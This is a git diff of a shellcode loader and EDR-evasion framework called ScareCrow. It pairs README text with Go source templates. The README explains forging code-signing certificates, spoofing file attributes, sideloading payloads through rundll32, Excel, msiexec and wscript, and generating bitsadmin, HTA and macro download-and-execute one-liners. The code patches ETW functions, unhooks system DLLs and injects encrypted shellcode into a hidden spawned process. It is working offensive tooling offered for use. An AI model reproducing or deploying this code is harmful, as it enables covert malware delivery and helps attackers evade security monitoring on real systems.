Files that are signed with code signing certificates are often put under less scrutiny, making it easier to be executed without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products don’t have the time to validate and verify these certificates (now some do but typically the common vendor names are included in a whitelist). ScareCrow creates these certificates by using a go package version of the tool `limelighter` to create a pfx12 file. This package takes an inputted domain name, specified by the user, to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the valid command-line option.
* Spoof the attributes of the loader:
This is done by using syso files which are a form of embedded resource files that when compiled along with our loader, will modify the attribute portions of our compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen this file name will map to the associated attributes for that file name, ensuring that the right values are assigned.
This is done by using syso files which are a form of embedded resource files that when compiled along with our loader, will modify the attribute portions of our compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen, this file name will map to the associated attributes for that file name, ensuring that the right values are assigned.
### File Attribute Sample
@@ -41,7 +41,7 @@ With these files and the go code, ScareCrow will cross compile them into DLLs us
## Install
The first step as always is to clone the repo. Before you compile ScareCrow you'll need to install the dependencies.
The first step as always is to clone the repo. Before you compile ScareCrow, you'll need to install the dependencies.
To install them, run following commands:
@@ -68,7 +68,7 @@ go build ScareCrow.go
```
./ScareCrow -h
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
@@ -81,64 +81,83 @@ go build ScareCrow.go
Usage of ./ScareCrow:
-I string
Path to the raw 64-bit shellcode.
Path to the raw 64-bit shellcode.
-Loader string
Sets the type of process that will sideload the malicious payload:
[*] binary - Generates a binary based payload. (This type does not benfit from any sideloading)
[*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
[*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process using a JScript loader.
[*] wscript - Loads into WScript process using a JScript loader.
(default "binary")
Sets the type of process that will sideload the malicious payload:
[*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
[*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified. A JScript loader will be generated.
[*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process using a JScript loader.
[*] msiexec - Loads into MSIexec process using a JScript loader.
[*] wscript - Loads into WScript process using a JScript loader.
(default "binary")
-O string
Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
-configfile string
The path to a json based configuration file to generate custom file attributes. This will not use the default ones.
-console
Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
-delivery string
Generates a one-liner command to download and execute the payload remotely:
[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders).
[*] hta - Generates a blank hta file containing the loader along with a MSHTA command execute the loader remotely in the background (Compatible with Control and Excel Loaders).
[*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)
Generates a one-liner command to download and execute the payload remotely:
[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders).
[*] hta - Generates a blank hta file containing the loader along with a MSHTA command to execute the loader remotely in the background (Compatible with Control and Excel Loaders).
[*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)
-domain string
The domain name to use for creating a fake code signing cert. (e.g. www.acme.com)
The domain name to use for creating a fake code signing cert. (e.g. www.acme.com)
-etw
Enables ETW patching to prevent ETW events from being generated
-injection string
Enables Process Injection Mode and specifies the path to the process to create/inject into (use \ for the path).
-password string
The password for code signing cert. Required when -valid is used.
The password for the code signing cert. Required when -valid is used.
-sandbox
Enables sandbox evasion using IsDomainedJoined calls.
Enables sandbox evasion using IsDomainedJoined calls.
-unmodified
When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)
When enabled will generate a DLL loader that WILL NOT remove the EDR hooks in system DLLs and only use custom syscalls (set to false by default)
-url string
URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)
URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)
-valid string
The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.
The path to a valid code signing cert. Used instead of -domain if a valid code signing cert is desired.
```
## Loader
The Loader determines the type of technique to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file, that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory:
* Control Panel – This generates a control panel applet (I.E Program and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with a file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory.
* WScript – Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to the side-by-side load (not injected) DLL loader into its own process. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load.
* Control Panel – This generates a control panel applet (i.e. Program and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with a file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory.
* WScript – Spawns a WScript process that utilizes a manifest file and registration-free Com techniques to load (not injected) DLL loader into its own process, side-by-side. This avoids registering the DLL in memory as the manifest file tells the process which, where, and what version of a DLL to load.
* Excel – Generates an XLL file which are Excel-based DLL files that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded.
* Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode.
ScareCrow also can generate binary based payloads if needed by using the `-loader` command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation.
ScareCrow can also generate binary based payloads if needed by using the `-loader` command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation.
## Console
ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keeps the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspiciousness and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional ` -ldflags -H=windowsgui` as this is highly signatured and classified in most security products as an Indicator of Compromise.
ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things, first it helps keep the process hidden and second, avoids being detected by any EDR product. Spawning a process right away in the background can be very suspiciousness and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows function after the process is created and the EDR’s hooks are loaded, and then changes the windows attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional ` -ldflags -H=windowsgui` as this is highly signatured and classified in most security products as an Indicator of Compromise.
If the `-console` command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing.
## Process Injection
ScareCrow contains the ability to do process injection attacks. To avoid any hooking or detection in either the loader process or the injected process itself, ScareCrow first unhooks the loader process as it would normally, to ensure there are no hooks in the process. Once completed, the loader will then spawn the process specified in the creation command. Once spawned, the loader will then create a handle to the process to retrieve a list of loaded DLLs. Once it finds DLLs, it will enumerate the base address of each DLL in the remote process. Using the function WriteProcessMemory the loader will then write the bytes of the system DLLs stored on disk (since they are “clean” of EDR hooks) without the need to change the memory permissions first. ScareCrow uses WriteProcessMemory because this function contains a feature primarily used in debugging where even if a section of memory is read-only, if everything is correct in the call to Write­Process­Memory, it will temporarily change the permission to read-write, update the memory section and then restore the original permissions. Once this is done, the loader can inject shellcode into the spawned process with no issue, as there are no EDR hooks in either process.
This option can be used with any of the loader options. To enable process injection, use the `-injection` command-line option along with the full path to the process you want to use to inject into. When putting the path in as an argument, it is important to either surround the full path with `""` or use double `\` for each directory in the path.
## ETW Bypass
ScareCrow contains the ability to patch ETW functions, preventing any event from being generated by the process. ETW utilizes built-in Syscalls to generate this telemetry. Since ETW is a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Use the `-etw` command-line option to enable this in your loader.
## Delivery
The deliver command line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include:
* Bits – This will generate a bitsadmin command that while download the loader remotely, execute it and remove it. This delivery command is compatible Binary, Control, Excel and Wscript loaders.
* HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. This delivery command is compatible Control and Excel loaders.
* Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. This delivery command is compatible Control, Excel and Wscript loaders.
* Bits – This will generate a bitsadmin command that while download the loader remotely, execute it and remove it. This delivery command is compatible with Binary, Control, Excel and Wscript loaders.
* HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. This delivery command is compatible with Control and Excel loaders.
* Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. This delivery command is compatible with Control, Excel and Wscript loaders.
## Custom Attribute Files
While ScareCrow has an extensive list of file attributes, there are some circumstances where a custom (maybe environment-specific) set of attributes is required. To accommodate this, ScareCrow allows for the inputting of a JSON file containing attributes. Using the `-configfile` command-line option, ScareCrow will use these attributes and filename instead of the pre-existing ones in ScareCrow. The file `main.json` contains a sample template of what the JSON structure needs to be to properly work. Note whatever you use as the "InternalName" will be the file name.
## To Do
* Currently only supports x64 payloads
* Some older versions of Window's OS (i.e Windows 7 or Windows 8.1), have issues reloading the systems DLLs, as a result a verison check is built in to ensure stability
* Some older versions of Window's OSes (i.e. Windows 7 or Windows 8.1), have issues reloading the systems DLLs, as a result a version check is built in to ensure stability
## Credit
* Special thanks to the artist, Luciano Buonamici for the artwork
* Special thanks to josephspurrier for his [repo](https://github.com/josephspurrier/goversioninfo)
+40 -18
View File
@@ -17,17 +17,20 @@ import (
)
type FlagOptions struct {
outFile string
inputFile string
URL string
LoaderType string
CommandLoader string
domain string
password string
valid string
console bool
refresher bool
sandbox bool
outFile string
inputFile string
URL string
LoaderType string
CommandLoader string
domain string
password string
valid string
configfile string
ProcessInjection string
ETW bool
console bool
refresher bool
sandbox bool
}
func options() *FlagOptions {
@@ -39,6 +42,7 @@ func options() *FlagOptions {
[*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
[*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process using a JScript loader.
[*] msiexec - Loads into MSIexec process using a JScript loader.
[*] wscript - Loads into WScript process using a JScript loader.
`)
refresher := flag.Bool("unmodified", false, "When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)")
@@ -49,17 +53,30 @@ func options() *FlagOptions {
[*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)`)
domain := flag.String("domain", "", "The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) ")
password := flag.String("password", "", "The password for code signing cert. Required when -valid is used.")
ETW := flag.Bool("etw", false, "Enables ETW patching to prevent ETW events from being generated")
ProcessInjection := flag.String("injection", "", "Enables Process Injection Mode and specify the path to the process to create/inject into (use \\ for the path).")
configfile := flag.String("configfile", "", "The path to a json based configuration file to generate custom file attributes. This will not use the the default ones.")
valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.")
sandbox := flag.Bool("sandbox", false, `Enables sandbox evasion using IsDomainedJoined calls.`)
flag.Parse()
return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, console: *console, refresher: *refresher, valid: *valid, sandbox: *sandbox}
return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, configfile: *configfile, console: *console, ETW: *ETW, ProcessInjection: *ProcessInjection, refresher: *refresher, valid: *valid, sandbox: *sandbox}
}
func execute(opt *FlagOptions, name string) {
func execute(opt *FlagOptions, name string) string {
bin, _ := exec.LookPath("env")
var compiledname string
limelighter.FileProperties(name)
var cmd *exec.Cmd
if opt.configfile != "" {
oldname := name
name = limelighter.FileProperties(name, opt.configfile)
cmd = exec.Command("mv", "../"+oldname+"", "../"+name+"")
err := cmd.Run()
if err != nil {
fmt.Printf("error")
}
} else {
name = limelighter.FileProperties(name, opt.configfile)
}
if opt.LoaderType == "binary" {
cmd = exec.Command(bin, "GOROOT_FINAL=/dev/null", "GOOS=windows", "GOARCH=amd64", "go", "build", "-a", "-trimpath", "-ldflags", "-s -w", "-o", ""+name+".exe")
} else {
@@ -81,6 +98,7 @@ func execute(opt *FlagOptions, name string) {
}
fmt.Println("[+] Payload Compiled")
limelighter.Signer(opt.domain, opt.password, opt.valid, compiledname)
return name
}
func main() {
@@ -105,7 +123,7 @@ func main() {
log.Fatal("Error: Please provide the url the loader will be hosted on in order to generate a delivery command")
}
if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "wscript" {
if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "msiexec" && opt.LoaderType != "wscript" {
log.Fatal("Error: Invalid loader, please select one of the allowed loader types")
}
@@ -128,7 +146,7 @@ func main() {
if opt.LoaderType == "binary" && opt.refresher == true {
log.Fatal("Error: Can not use the unmodified option with a binary loader")
}
if opt.console == true && opt.LoaderType != "binary" {
log.Fatal("Error: Console mode is only for binary based payloads")
}
@@ -141,6 +159,10 @@ func main() {
log.Fatal("Error: Please provide a password for the valid code signing certificate")
}
if opt.ProcessInjection != "" && opt.ETW == true {
log.Fatal("Error: Currently process injection and ETW bypass is not available together yet. Please try only one of these options")
}
var rawbyte []byte
src, _ := ioutil.ReadFile(opt.inputFile)
dst := make([]byte, hex.EncodedLen(len(src)))
@@ -166,8 +188,8 @@ func main() {
b64key := base64.StdEncoding.EncodeToString(key)
b64iv := base64.StdEncoding.EncodeToString(iv)
fmt.Println("[+] Shellcode Encrypted")
name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.refresher, opt.console, opt.sandbox)
execute(opt, name)
name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.refresher, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection)
name = execute(opt, name)
Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox)
}
Binary file not shown.

Before

Width:  |  Height:  |  Size: 86 KiB

After

Width:  |  Height:  |  Size: 110 KiB

+954 -2
View File
@@ -115,6 +115,13 @@ func JS_Control_Sub() string {
`
}
func JS_Msiexec_Sub() string {
return `
var {{.Variables.objShell}} = new ActiveXObject("shell.application");
{{.Variables.objShell}}.ShellExecute("msiexec", "/z "+{{.Variables.dropPath}}+"\\{{.Variables.FileName}}{{.Variables.dllext}}", "", "", 1);
`
}
func JSfile() string {
return `
try {
@@ -461,7 +468,8 @@ func Binary() string {
{{.Variables.SyscallNumberlist}}
}
{{.Variables.ETW_Function}}
func errnoErr(e syscall.Errno) error {
switch e {
@@ -497,10 +505,15 @@ func Binary() string {
if {{.Variables.Version}} == "10.0" {
{{.Variables.loader}}()
}
{{.Variables.ETW}}
{{.Variables.Pointer}}
{{.Variables.ptr}} := func() {
}
{{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString("{{.Variables.ciphertext}}")
{{.Variables.b64_string1name}} := "{{.Variables.b64_string1value}}"
{{.Variables.b64_string2name}} := "{{.Variables.b64_string2value}}"
{{.Variables.fullciphertext}} := {{.Variables.b64_string1name}} + {{.Variables.b64_string2name}}
{{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString({{.Variables.fullciphertext}})
{{.Variables.vkey}}, _ := base64.StdEncoding.DecodeString("{{.Variables.key}}")
{{.Variables.viv}}, _ := base64.StdEncoding.DecodeString("{{.Variables.iv}}")
@@ -785,3 +798,942 @@ func WindowsVersion_Binary() string {
return {{.Variables.Version}}
`
}
func ETW_Function() string {
return `
var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL("kernel32.dll").NewProc("WriteProcessMemory")
var {{.Variables.procEtwNotificationRegister}} = syscall.NewLazyDLL("ntdll.dll").NewProc("EtwNotificationRegister")
var {{.Variables.procEtwEventRegister}} = syscall.NewLazyDLL("ntdll.dll").NewProc("EtwEventRegister")
var {{.Variables.procEtwEventWriteFull}} = syscall.NewLazyDLL("ntdll.dll").NewProc("EtwEventWriteFull")
var (
errERROR_IO_PENDING error = syscall.Errno(errnoERROR_IO_PENDING)
)
const (
errnoERROR_IO_PENDING = 997
)
func {{.Variables.errnoErr}}(e syscall.Errno) error {
switch e {
case 0:
return nil
case errnoERROR_IO_PENDING:
return errERROR_IO_PENDING
}
return e
}
func {{.Variables.WriteProcessMemory}}({{.Variables.hProcess}} uintptr, {{.Variables.lpBaseAddress}} uintptr, {{.Variables.lpBuffer}} *byte, {{.Variables.nSize}} uintptr, {{.Variables.lpNumberOfBytesWritten}} *uintptr) (err error) {
r1, _, e1 := syscall.Syscall6({{.Variables.procWriteProcessMemory}}.Addr(), 5, uintptr({{.Variables.hProcess}}), uintptr({{.Variables.lpBaseAddress}}), uintptr(unsafe.Pointer({{.Variables.lpBuffer}})), uintptr({{.Variables.nSize}}), uintptr(unsafe.Pointer({{.Variables.lpNumberOfBytesWritten}})), 0)
if r1 == 0 {
if e1 != 0 {
err = {{.Variables.errnoErr}}(e1)
} else {
err = syscall.EINVAL
}
}
return
}
func {{.Variables.ETW}}() {
{{.Variables.handle}} := uintptr(0xffffffffffffffff)
{{.Variables.dataAddr}} := []uintptr{ {{.Variables.procEtwNotificationRegister}}.Addr(), {{.Variables.procEtwEventRegister}}.Addr(), {{.Variables.procEtwEventWriteFull}}.Addr()}
for i, _ := range {{.Variables.dataAddr}} {
{{.Variables.data}}, _ := hex.DecodeString("4833C0C3")
var {{.Variables.nLength}} uintptr
{{.Variables.datalength}} := len({{.Variables.data}})
{{.Variables.WriteProcessMemory}}({{.Variables.handle}}, {{.Variables.dataAddr}}[i], &{{.Variables.data}}[0], uintptr(uint32({{.Variables.datalength}})), &{{.Variables.nLength}})
}
}
`
}
func Procces_Injection_DLL() string {
return `
package main
import "C"
import (
"crypto/aes"
"crypto/cipher"
"debug/pe"
"encoding/base64"
"encoding/hex"
"fmt"
"loader/loader"
"io/ioutil"
"syscall"
"time"
"unsafe"
"strconv"
"golang.org/x/sys/windows"
"golang.org/x/sys/windows/registry"
)
const (
{{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF
)
var _ unsafe.Pointer
const (
{{.Variables.errnoERROR_IO_PENDING}}= 997
)
var (
{{.Variables.errERROR_IO_PENDING}} error = syscall.Errno({{.Variables.errnoERROR_IO_PENDING}})
{{.Variables.customsyscall}} uint16
{{.Variables.customsyscallVP}} uint16
{{.Variables.Version}} string
)
func errnoErr(e syscall.Errno) error {
switch e {
case 0:
return nil
case {{.Variables.errnoERROR_IO_PENDING}}:
return {{.Variables.errERROR_IO_PENDING}}
}
return e
}
var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL("kernel32.dll").NewProc("WriteProcessMemory")
var {{.Variables.funcNtCreateThreadEx}} = syscall.NewLazyDLL("ntdll.dll").NewProc("NtCreateThreadEx")
var {{.Variables.funcNtWriteVirtualMemory}} = syscall.NewLazyDLL("ntdll.dll").NewProc("NtWriteVirtualMemory")
var {{.Variables.funcNtAllocateVirtualMemory}} = syscall.NewLazyDLL("ntdll.dll").NewProc("NtAllocateVirtualMemory")
var {{.Variables.funcNtProtectVirtualMemory}} = syscall.NewLazyDLL("ntdll.dll").NewProc("NtProtectVirtualMemory")
var {{.Variables.procEnumProcessModules}} = syscall.NewLazyDLL("psapi.dll").NewProc("EnumProcessModules")
var {{.Variables.procGetModuleBaseName}} = syscall.NewLazyDLL("psapi.dll").NewProc("GetModuleBaseNameW")
var {{.Variables.procGetModuleInformation}} = syscall.NewLazyDLL("psapi.dll").NewProc("GetModuleInformation")
func errno(e1 error) error {
if e1, ok := e1.(syscall.Errno); ok && e1 == 0 {
e1 = syscall.EINVAL
}
return e1
}
type SyscallError struct {
call string
err error
}
func (e *SyscallError) Error() string {
return fmt.Sprintf("%s: %v", e.call, e.err)
}
const (
MEM_FREE = 0x100 << 8
MEM_COMMIT = 0x10 << 8
MEM_RESERVE = 0x20 << 8
)
type StartupInfoEx struct {
windows.StartupInfo
AttributeList *PROC_THREAD_ATTRIBUTE_LIST
}
type PROC_THREAD_ATTRIBUTE_LIST struct {
dwFlags uint32
size uint64
count uint64
reserved uint64
unknown *uint64
entries []*PROC_THREAD_ATTRIBUTE_ENTRY
}
type PROC_THREAD_ATTRIBUTE_ENTRY struct {
attribute *uint32
cbSize uintptr
lpValue uintptr
}
type MemoryBasicInfo struct {
BaseAddress uintptr
AllocationBase uintptr
AllocationProtect uint32
RegionSize uintptr
State uint32
Protect uint32
Type uint32
}
type MODULEINFO struct {
LpBaseOfDll uintptr
SizeOfImage uint32
EntryPoint uintptr
}
func {{.Variables.CreateProcess}}() *syscall.ProcessInformation {
var {{.Variables.si}} syscall.StartupInfo
var {{.Variables.pi}} syscall.ProcessInformation
{{.Variables.Target}} := "{{.Variables.processpath}}"
{{.Variables.commandLine}}, {{.Variables.err}} := syscall.UTF16PtrFromString({{.Variables.Target}})
if {{.Variables.err}} != nil {
panic({{.Variables.err}})
}
var {{.Variables.startupInfo}} StartupInfoEx
{{.Variables.si}}.Cb = uint32(unsafe.Sizeof({{.Variables.startupInfo}}))
{{.Variables.si}}.Flags |= windows.STARTF_USESHOWWINDOW
{{.Variables.si}}.ShowWindow = windows.SW_HIDE
{{.Variables.err}} = syscall.CreateProcess(
nil,
{{.Variables.commandLine}},
nil,
nil,
false,
0,
nil,
nil,
&{{.Variables.si}},
&{{.Variables.pi}})
if {{.Variables.err}} != nil {
panic({{.Variables.err}})
}
return &{{.Variables.pi}}
}
func {{.Variables.GetModuleInformation}}({{.Variables.hProcess}} windows.Handle, {{.Variables.hModule}} windows.Handle) (MODULEINFO, error) {
{{.Variables.mi}} := MODULEINFO{}
_, _, {{.Variables.err}} := {{.Variables.procGetModuleInformation}}.Call(
uintptr({{.Variables.hProcess}}),
uintptr({{.Variables.hModule}}),
uintptr(unsafe.Pointer(&{{.Variables.mi}})),
uintptr(uint32(unsafe.Sizeof({{.Variables.mi}}))))
if {{.Variables.err}}.(syscall.Errno) != 0 {
return {{.Variables.mi}}, {{.Variables.err}}
}
return {{.Variables.mi}}, nil
}
func {{.Variables.GetModuleBaseName}}({{.Variables.process}} windows.Handle, {{.Variables.module}} windows.Handle, {{.Variables.outString}} *uint16, {{.Variables.size}} uint32) ({{.Variables.n}} int, err error) {
r1, _, e1 := {{.Variables.procGetModuleBaseName}}.Call(
uintptr({{.Variables.process}}),
uintptr({{.Variables.module}}),
uintptr(unsafe.Pointer({{.Variables.outString}})),
uintptr({{.Variables.size}}),
)
if r1 == 0 {
return 0, errno(e1)
}
return int(r1), nil
}
func {{.Variables.EnumProcessModules}}({{.Variables.process}} windows.Handle, {{.Variables.modules}} []windows.Handle) ({{.Variables.n}} int, {{.Variables.err}} error) {
var {{.Variables.needed}} int32
const {{.Variables.handleSize}} = unsafe.Sizeof({{.Variables.modules}}[0])
r1, _, e1 := {{.Variables.procEnumProcessModules}}.Call(
uintptr({{.Variables.process}}),
uintptr(unsafe.Pointer(&{{.Variables.modules}}[0])),
{{.Variables.handleSize}}*uintptr(len({{.Variables.modules}})),
uintptr(unsafe.Pointer(&{{.Variables.needed}})),
)
if r1 == 0 {
{{.Variables.err}} = errno(e1)
return 0, {{.Variables.err}}
}
{{.Variables.n}} = int(uintptr({{.Variables.needed}}) / {{.Variables.handleSize}})
return {{.Variables.n}}, nil
}
func {{.Variables.WriteProcessMemory}}({{.Variables.hProcess}} windows.Handle, {{.Variables.lpBaseAddress}} uintptr, {{.Variables.lpBuffer}} uintptr, {{.Variables.nSize}} uintptr, {{.Variables.lpNumberOfBytesWritten}} *uintptr) ({{.Variables.err}} error) {
r1, _, e1 := syscall.Syscall6({{.Variables.procWriteProcessMemory}}.Addr(), 5, uintptr({{.Variables.hProcess}}), uintptr({{.Variables.lpBaseAddress}}), uintptr(unsafe.Pointer({{.Variables.lpBuffer}})), uintptr({{.Variables.nSize}}), uintptr(unsafe.Pointer({{.Variables.lpNumberOfBytesWritten}})), 0)
if r1 == 0 {
if e1 != 0 {
{{.Variables.err}} = errnoErr(e1)
} else {
{{.Variables.err}} = syscall.EINVAL
}
}
return
}
{{.Variables.Sandboxfunction}}
func {{.Variables.PKCS5UnPadding}}({{.Variables.src}} []byte) []byte {
{{.Variables.length}} := len({{.Variables.src}})
{{.Variables.unpadding}} := int({{.Variables.src}}[{{.Variables.length}}-1])
return {{.Variables.src}}[:({{.Variables.length}} - {{.Variables.unpadding}} )]
}
func {{.Variables.Versionfunc}}() string {
{{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE)
{{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion")
{{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber")
if err == nil{
{{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber")
{{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." + strconv.FormatUint({{.Variables.MinV}}, 10)
}
defer {{.Variables.k}}.Close()
{{.Variables.SyscallNumberlist}}
}
{{.Variables.ETW_Function}}
func {{.Variables.loader}}() {
err := {{.Variables.Reloading}}("C:\\Windows\\System32\\kernel32.dll")
if err != nil {
}
err = {{.Variables.Reloading}}("C:\\Windows\\System32\\kernelbase.dll")
if err != nil {
}
err = {{.Variables.Reloading}}("C:\\Windows\\System32\\ntdll.dll")
if err != nil {
}
}
func {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}} []byte) {
{{.Variables.pi}} := {{.Variables.CreateProcess}}()
time.Sleep(5 * time.Second)
if {{.Variables.Version}} == "10.0" {
{{.Variables.hh}}, {{.Variables.err}} := windows.OpenProcess({{.Variables.PROCESS_ALL_ACCESS}}, false, {{.Variables.pi}}.ProcessId)
if {{.Variables.err}} != nil {
}
{{.Variables.modules}} := make([]windows.Handle, 255)
{{.Variables.n}}, {{.Variables.err}} := {{.Variables.EnumProcessModules}}({{.Variables.hh}}, {{.Variables.modules}})
if {{.Variables.err}} != nil {
fmt.Println(&SyscallError{"EnumProcessModules", {{.Variables.err}}})
}
if {{.Variables.n}} < len({{.Variables.modules}}) {
{{.Variables.modules}} = {{.Variables.modules}}[:{{.Variables.n}}]
}
var {{.Variables.buf}} = make([]uint16, 255)
for _, {{.Variables.mod}} := range {{.Variables.modules}} {
{{.Variables.MI}}, _ := {{.Variables.GetModuleInformation}}({{.Variables.hh}}, {{.Variables.mod}})
{{.Variables.n}}, {{.Variables.err}} := {{.Variables.GetModuleBaseName}}({{.Variables.hh}}, {{.Variables.mod}}, &{{.Variables.buf}}[0], uint32(len({{.Variables.buf}})))
if {{.Variables.err}} != nil {
}
{{.Variables.s}} := windows.UTF16ToString({{.Variables.buf}}[:{{.Variables.n}}])
if {{.Variables.s}} == "ntdll.dll" {
{{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\ntdll.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}})
}
if {{.Variables.s}} == "KERNEL32.DLL" {
{{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\kernel32.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}})
}
if {{.Variables.s}} == "KERNELBASE.dll" {
{{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\kernelbase.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}})
}
}
}
{{.Variables.shellcode}} := {{.Variables.raw_bin}}
{{.Variables.oldProtect}} := windows.PAGE_READWRITE
var {{.Variables.lpBaseAddress}} uintptr
{{.Variables.size}} := len({{.Variables.shellcode}})
{{.Variables.funcNtAllocateVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), uintptr(unsafe.Pointer(&{{.Variables.lpBaseAddress}})), 0, uintptr(unsafe.Pointer(&{{.Variables.size}})), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
{{.Variables.funcNtWriteVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), {{.Variables.lpBaseAddress}}, uintptr(unsafe.Pointer(&{{.Variables.shellcode}}[0])), uintptr({{.Variables.size}}), 0)
{{.Variables.funcNtProtectVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), uintptr(unsafe.Pointer(&{{.Variables.lpBaseAddress}})), uintptr(unsafe.Pointer(&{{.Variables.size}})), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&{{.Variables.oldProtect}})))
